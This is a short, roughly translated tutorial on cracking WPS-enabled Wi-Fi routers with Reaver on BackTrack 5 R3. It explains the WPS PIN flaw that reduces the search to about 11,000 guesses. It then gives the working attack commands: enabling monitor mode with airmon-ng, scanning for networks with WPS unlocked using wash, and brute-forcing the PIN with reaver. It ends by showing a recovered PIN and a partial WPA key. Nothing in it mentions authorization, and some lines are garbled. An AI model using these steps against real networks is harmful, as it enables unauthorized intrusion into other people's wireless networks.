REAVER ATTACK WITH BACK TRACK 5 R3 TO WEP, WPA AND WPA2 NETWORKS WITH WPS STANDARD ROUTER.
The WPS system fails in one of the methods that the standard has when adding new equipment to our WiFi network, specifically the one that uses a PIN number, since the client trying to connect to the network can send any PIN number of 8 digits and if it does not match that of the access point, it indicates the error but it has been discovered that sending only the first 4 digits a response is obtained. Thus, the number of possibilities to find out the number drops from 100 million combinations to no less than 11.000, so it is a matter of achieving it with a brute force attack in a matter of hours.
Initially we see the existing network adapters.
Monitor mode is enabled.
Command airmon-ng start wlan0, the mon0 interface must be enabled, which is the one with which the reaver attack will be launched.
Graph steps 1 and 2 ..
We check the networks that have the WPS unlocked that can be attacked (note if giving the command no network appears, it means that there are no networks with these characteristics in the area).
Command wash them mon0
4TH AND LAST STEP.
We started our attack, which is not by packets like the previous ones, it is by pins, the system tests all possible combinations of a group of 8 digits (note in the networks that were violated the pin was 12345670) in case of having another combination it is takes 1-2 hours) you need to access the key.
Command reaver -i mon0 -b (bssid) -c (channel) -vv
how can you see the pin is 12345670
and the key is 364137324339… AND THE NETWORK IS A WPA.